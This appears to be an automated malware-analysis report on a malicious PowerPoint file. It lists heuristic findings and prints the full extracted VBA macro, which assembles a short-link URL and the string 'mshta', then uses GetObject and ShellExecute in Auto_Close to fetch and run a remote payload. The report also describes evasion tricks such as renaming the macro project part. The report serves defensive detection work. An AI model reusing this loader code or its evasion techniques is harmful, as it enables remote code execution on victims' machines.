Verdict: MALICIOUS
Risk Score: 208

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The OOXML file contains a heavily obfuscated VBA macro within the Auto_Close function. This macro constructs a URL, 'https://j.mp/adsfljsdahdvstarajraj', and uses GetObject to execute a second-stage payload via ShellExecute. The obfuscation and use of Auto_Close indicate a malicious intent to download and run arbitrary code.
Heuristics (6)

- VBA project inside OOXML [medium; 5 related findings] (OOXML_VBA): Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/villia.bin).
- Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: `= _ GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen")) : MsgBox "Microsoft Office not Installed"`
- VBA project part renamed to evade filename detection [high] (OOXML_VBA_PROJECT_RENAMED): The VBA project is bound through the OOXML relationship/content type, but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
- GetObject call [high] (OLE_VBA_GETOBJ): GetObject call.
  Matched line in script: `= _ GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen")) : MsgBox "Microsoft Office not Installed"`
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Auto_Close macro [low] (OLE_VBA_AUTOCLOSE): Auto_Close macro.
  Matched line in script: `Function _ Auto_Close _ () _`
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1104 bytes |

SHA-256: e22d4007949b8c7fca2429debefc5cd675efe02bffcc321fd4911cf6a95b58e5

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Function _
X _
() _
As _
String
X _
= _
"M"
End _
Function
Function _
Y _
() _
As _
String
Y _
= _
"s"
End _
Function
Function _
Z _
() _
As _
String
Z _
= _
"H"
End _
Function
Function _
D _
() _
As _
String
D _
= _
"T"
End _
Function
Function _
E _
() _
As _
String
E _
= _
"a"
End _
Function
Function _
L _
() _
As _
String
L _
= _
"p"
End _
Function
Function _
K _
() _
As _
String
K _
= _
"j.mp/"
End _
Function
Function _
T() _
As _
String
T _
= _
"adsfljsdahdvstarajraj"
End _
Function
Function _
F _
() _
As _
String
F _
= _
"H" _
+ _
D _
+ _
D _
+ _
L _
+ _
"://" _
+ _
K _
+ _
T
End _
Function
Function _
calccc _
() _
As _
String
calccc _
= _
X _
+ _
Y _
+ _
Z _
+ _
D _
+ _
E
End _
Function
Function _
Auto_Close _
() _
As _
String
Set _
alsoasld _
= _
GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
: MsgBox "Microsoft Office not Installed"
: alsoasld _
. _
shellexecute _
calccc, F
End Function
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: ppt/villia.bin | 19456 bytes |

SHA-256: ba3a4fd41266112be0b6c42b1895e6324ed73904d07bb6608a1501e95faf59fe